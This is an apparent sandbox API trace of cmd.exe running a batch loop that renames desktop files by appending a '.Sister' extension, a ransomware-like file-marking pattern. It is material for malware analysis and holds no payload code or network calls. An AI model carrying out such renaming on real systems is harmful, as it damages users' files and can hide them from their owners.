[0174.981] GetFileType (hFile=0x50) returned 0x2 [0174.981] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0174.981] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0175.002] _get_osfhandle (_FileHandle=1) returned 0x50 [0175.002] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0175.021] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0175.021] _get_osfhandle (_FileHandle=1) returned 0x50 [0175.021] GetFileType (hFile=0x50) returned 0x2 [0175.021] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0175.021] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0175.031] _get_osfhandle (_FileHandle=1) returned 0x50 [0175.031] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0175.042] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0175.042] _get_osfhandle (_FileHandle=1) returned 0x50 [0175.042] GetFileType (hFile=0x50) returned 0x2 [0175.042] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0175.042] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0175.148] _get_osfhandle (_FileHandle=1) returned 0x50 [0175.148] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0175.163] _get_osfhandle (_FileHandle=1) returned 0x50 [0175.163] GetFileType (hFile=0x50) returned 0x2 [0175.163] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0175.163] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0175.170] _get_osfhandle (_FileHandle=1) returned 0x50 [0175.170] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed94d73e0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed94d73e0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0175.172] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"rBP 3.rtf.Sister\" \"rBP 3.bat\" ") returned 32 [0175.172] _get_osfhandle (_FileHandle=1) returned 0x50 [0175.172] GetFileType (hFile=0x50) returned 0x2 [0175.172] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0175.172] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0175.189] _get_osfhandle (_FileHandle=1) returned 0x50 [0175.189] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x20, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x20) returned 1 [0175.195] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0175.195] _get_osfhandle (_FileHandle=1) returned 0x50 [0175.195] GetFileType (hFile=0x50) returned 0x2 [0175.196] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0175.196] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0175.197] _get_osfhandle (_FileHandle=1) returned 0x50 [0175.197] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0175.209] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0175.215] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0175.215] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0175.215] malloc (_Size=0xffce) returned 0x21ed95fff80 [0175.215] ??_V@YAXPEAX@Z () returned 0x21ed95fff80 [0175.215] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0175.215] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0175.216] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0175.216] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0175.216] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0175.216] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0175.216] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0175.216] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0175.216] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0175.216] ??_V@YAXPEAX@Z () returned 0x1 [0175.216] GetProcessHeap () returned 0x21ed8c70000 [0175.216] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x90) returned 0x21ed8d63780 [0175.216] GetProcessHeap () returned 0x21ed8c70000 [0175.216] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d63780, Size=0x50) returned 0x21ed8d63780 [0175.216] GetProcessHeap () returned 0x21ed8c70000 [0175.216] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d63780) returned 0x50 [0175.216] GetProcessHeap () returned 0x21ed8c70000 [0175.217] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d65760 [0175.217] GetProcessHeap () returned 0x21ed8c70000 [0175.217] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x90) returned 0x21ed8d64920 [0175.217] GetProcessHeap () returned 0x21ed8c70000 [0175.217] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d64920, Size=0x50) returned 0x21ed8d64920 [0175.217] GetProcessHeap () returned 0x21ed8c70000 [0175.217] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d64920) returned 0x50 [0175.217] malloc (_Size=0xffce) returned 0x21ed95fff80 [0175.217] ??_V@YAXPEAX@Z () returned 0x21ed95fff80 [0175.219] GetProcessHeap () returned 0x21ed8c70000 [0175.219] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d656a0 [0175.219] GetProcessHeap () returned 0x21ed8c70000 [0175.219] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9484100 [0175.219] _wcsicmp (_String1="rBP 3.rtf", _String2=".") returned 68 [0175.219] _wcsicmp (_String1="rBP 3.rtf", _String2="..") returned 68 [0175.219] GetFileAttributesW (lpFileName="rBP 3.rtf" (normalized: "c:\\users\\fd1hvy\\desktop\\rbp 3.rtf")) returned 0x20 [0175.220] GetProcessHeap () returned 0x21ed8c70000 [0175.220] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed94d7530 [0175.221] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed94d7540 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0175.221] SetErrorMode (uMode=0x0) returned 0x0 [0175.221] SetErrorMode (uMode=0x1) returned 0x0 [0175.221] GetFullPathNameW (in: lpFileName="rBP 3.rtf", nBufferLength=0x7fe7, lpBuffer=0x21ed95fff80, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\rBP 3.rtf", lpFilePart=0xa6cf4fd660*="rBP 3.rtf") returned 0x21 [0175.221] SetErrorMode (uMode=0x0) returned 0x1 [0175.222] GetProcessHeap () returned 0x21ed8c70000 [0175.222] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9485e40 [0175.222] _wcsicmp (_String1="rBP 3.rtf", _String2=".") returned 68 [0175.222] _wcsicmp (_String1="rBP 3.rtf", _String2="..") returned 68 [0175.222] GetFileAttributesW (lpFileName="rBP 3.rtf" (normalized: "c:\\users\\fd1hvy\\desktop\\rbp 3.rtf")) returned 0x20 [0175.222] ??_V@YAXPEAX@Z () returned 0x1 [0175.222] malloc (_Size=0xffce) returned 0x21ed95fff80 [0175.222] ??_V@YAXPEAX@Z () returned 0x21ed95fff80 [0175.222] malloc (_Size=0xffce) returned 0x21ed960ff60 [0175.222] ??_V@YAXPEAX@Z () returned 0x21ed960ff60 [0175.223] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\rBP 3.rtf" (normalized: "c:\\users\\fd1hvy\\desktop\\rbp 3.rtf")) returned 0x20 [0175.223] malloc (_Size=0xffce) returned 0x21ed923fd00 [0175.223] ??_V@YAXPEAX@Z () returned 0x21ed923fd00 [0175.223] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\rBP 3.rtf", fInfoLevelId=0x1, lpFindFileData=0x21ed9484110, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed9484110) returned 0x21ed8d650a0 [0175.223] malloc (_Size=0xffce) returned 0x21ed924fce0 [0175.223] ??_V@YAXPEAX@Z () returned 0x21ed924fce0 [0175.223] ??_V@YAXPEAX@Z () returned 0x1 [0175.224] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\rBP 3.rtf" (normalized: "c:\\users\\fd1hvy\\desktop\\rbp 3.rtf"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\rBP 3.rtf.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\rbp 3.rtf.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0175.232] FindNextFileW (in: hFindFile=0x21ed8d650a0, lpFindFileData=0x21ed9484110 | out: lpFindFileData=0x21ed9484110*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c334170, ftCreationTime.dwHighDateTime=0x1d5f0ae, ftLastAccessTime.dwLowDateTime=0x4fecbaf0, ftLastAccessTime.dwHighDateTime=0x1d5e39e, ftLastWriteTime.dwLowDateTime=0x4fecbaf0, ftLastWriteTime.dwHighDateTime=0x1d5e39e, nFileSizeHigh=0x0, nFileSizeLow=0x90da, dwReserved0=0x0, dwReserved1=0x0, cFileName="rBP 3.rtf", cAlternateFileName="")) returned 0 [0175.234] GetLastError () returned 0x12 [0175.234] FindClose (in: hFindFile=0x21ed8d650a0 | out: hFindFile=0x21ed8d650a0) returned 1 [0175.234] ??_V@YAXPEAX@Z () returned 0x1 [0175.234] ??_V@YAXPEAX@Z () returned 0x1 [0175.234] ??_V@YAXPEAX@Z () returned 0x1 [0175.236] ??_V@YAXPEAX@Z () returned 0x1 [0175.237] GetProcessHeap () returned 0x21ed8c70000 [0175.237] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d64f20 [0175.237] GetProcessHeap () returned 0x21ed8c70000 [0175.237] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95640, Size=0x16) returned 0x21ed8c95800 [0175.237] GetProcessHeap () returned 0x21ed8c70000 [0175.237] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95800) returned 0x16 [0175.237] GetProcessHeap () returned 0x21ed8c70000 [0175.237] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d330, Size=0x20) returned 0x21ed8c7d330 [0175.237] GetProcessHeap () returned 0x21ed8c70000 [0175.237] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d330) returned 0x20 [0175.237] GetProcessHeap () returned 0x21ed8c70000 [0175.237] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed9496cd0 [0175.237] GetProcessHeap () returned 0x21ed8c70000 [0175.237] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9496cd0, Size=0xb2) returned 0x21ed9496cd0 [0175.237] GetProcessHeap () returned 0x21ed8c70000 [0175.237] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9496cd0) returned 0xb2 [0175.237] GetProcessHeap () returned 0x21ed8c70000 [0175.237] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d69540 [0175.238] GetProcessHeap () returned 0x21ed8c70000 [0175.238] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d69540, Size=0x30) returned 0x21ed8d69540 [0175.238] GetProcessHeap () returned 0x21ed8c70000 [0175.238] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d69540) returned 0x30 [0175.238] GetProcessHeap () returned 0x21ed8c70000 [0175.238] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d69580 [0175.238] malloc (_Size=0x1ff9c) returned 0x21ed95fff80 [0175.242] GetProcessHeap () returned 0x21ed8c70000 [0175.242] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed937cd90 [0175.242] GetProcessHeap () returned 0x21ed8c70000 [0175.242] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed937df90 [0175.242] ??_V@YAXPEAX@Z () returned 0x1 [0175.242] malloc (_Size=0x1ff9c) returned 0x21ed95fff80 [0175.242] GetProcessHeap () returned 0x21ed8c70000 [0175.242] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed937d390 [0175.242] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed95fff80, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0175.243] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d63810, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d657c0 [0175.243] FindClose (in: hFindFile=0x21ed8d657c0 | out: hFindFile=0x21ed8d657c0) returned 1 [0175.243] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d63810, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d655e0 [0175.243] FindClose (in: hFindFile=0x21ed8d655e0 | out: hFindFile=0x21ed8d655e0) returned 1 [0175.243] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x930c9cd6, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x930c9cd6, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d63810, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d657c0 [0175.244] FindClose (in: hFindFile=0x21ed8d657c0 | out: hFindFile=0x21ed8d657c0) returned 1 [0175.244] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x930c9cd6, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x930c9cd6, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d63810, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0175.244] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0175.245] ??_V@YAXPEAX@Z () returned 0x21ed923fd00 [0175.246] GetProcessHeap () returned 0x21ed8c70000 [0175.246] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d67130 [0175.246] ??_V@YAXPEAX@Z () returned 0x1 [0175.246] ??_V@YAXPEAX@Z () returned 0x1 [0175.246] GetProcessHeap () returned 0x21ed8c70000 [0175.246] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d69580, Size=0x490) returned 0x21ed8d69580 [0175.246] GetProcessHeap () returned 0x21ed8c70000 [0175.246] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d69580) returned 0x490 [0175.246] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0175.246] _get_osfhandle (_FileHandle=1) returned 0x50 [0175.247] GetFileType (hFile=0x50) returned 0x2 [0175.247] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0175.247] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0175.261] _get_osfhandle (_FileHandle=1) returned 0x50 [0175.261] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0175.287] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0175.306] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0175.306] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0175.306] _get_osfhandle (_FileHandle=1) returned 0x50 [0175.306] GetFileType (hFile=0x50) returned 0x2 [0175.306] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0175.306] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0175.311] _get_osfhandle (_FileHandle=1) returned 0x50 [0175.311] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x18) returned 1 [0175.322] _get_osfhandle (_FileHandle=1) returned 0x50 [0175.322] GetFileType (hFile=0x50) returned 0x2 [0175.322] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0175.323] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0175.347] _get_osfhandle (_FileHandle=1) returned 0x50 [0175.347] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d69550*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed8d69550*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0175.351] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0175.351] _get_osfhandle (_FileHandle=1) returned 0x50 [0175.351] GetFileType (hFile=0x50) returned 0x2 [0175.351] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0175.351] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0175.354] _get_osfhandle (_FileHandle=1) returned 0x50 [0175.357] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0175.370] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0175.370] _get_osfhandle (_FileHandle=1) returned 0x50 [0175.370] GetFileType (hFile=0x50) returned 0x2 [0175.370] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0175.370] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0175.387] _get_osfhandle (_FileHandle=1) returned 0x50 [0175.387] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0175.406] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0175.421] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0175.421] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0175.421] malloc (_Size=0xffce) returned 0x21ed95fff80 [0175.421] ??_V@YAXPEAX@Z () returned 0x21ed95fff80 [0175.421] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0175.421] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0175.421] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0175.421] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0175.421] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0175.421] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0175.421] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0175.421] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0175.421] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0175.421] ??_V@YAXPEAX@Z () returned 0x1 [0175.422] GetProcessHeap () returned 0x21ed8c70000 [0175.422] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed9378a00 [0175.422] GetProcessHeap () returned 0x21ed8c70000 [0175.422] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9378a00, Size=0x130) returned 0x21ed9378a00 [0175.422] GetProcessHeap () returned 0x21ed8c70000 [0175.422] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9378a00) returned 0x130 [0175.422] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0175.422] malloc (_Size=0xffce) returned 0x21ed95fff80 [0175.422] ??_V@YAXPEAX@Z () returned 0x21ed95fff80 [0175.422] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0175.422] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed95fff80, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0175.424] ??_V@YAXPEAX@Z () returned 0x1 [0175.424] GetProcessHeap () returned 0x21ed8c70000 [0175.424] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d626d0 [0175.424] GetProcessHeap () returned 0x21ed8c70000 [0175.424] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed9378b40 [0175.424] GetProcessHeap () returned 0x21ed8c70000 [0175.424] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9378b40, Size=0x130) returned 0x21ed9378b40 [0175.424] GetProcessHeap () returned 0x21ed8c70000 [0175.424] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9378b40) returned 0x130 [0175.424] malloc (_Size=0xffce) returned 0x21ed95fff80 [0175.424] ??_V@YAXPEAX@Z () returned 0x21ed95fff80 [0175.424] GetProcessHeap () returned 0x21ed8c70000 [0175.424] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d65520 [0175.424] GetProcessHeap () returned 0x21ed8c70000 [0175.424] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed94845e0 [0175.425] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0175.425] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0175.425] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0175.425] GetLastError () returned 0x2 [0175.425] GetProcessHeap () returned 0x21ed8c70000 [0175.425] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed94e7520 [0175.425] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed94e7530 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0175.425] SetErrorMode (uMode=0x0) returned 0x0 [0175.425] SetErrorMode (uMode=0x1) returned 0x0 [0175.425] GetFullPathNameW (in: 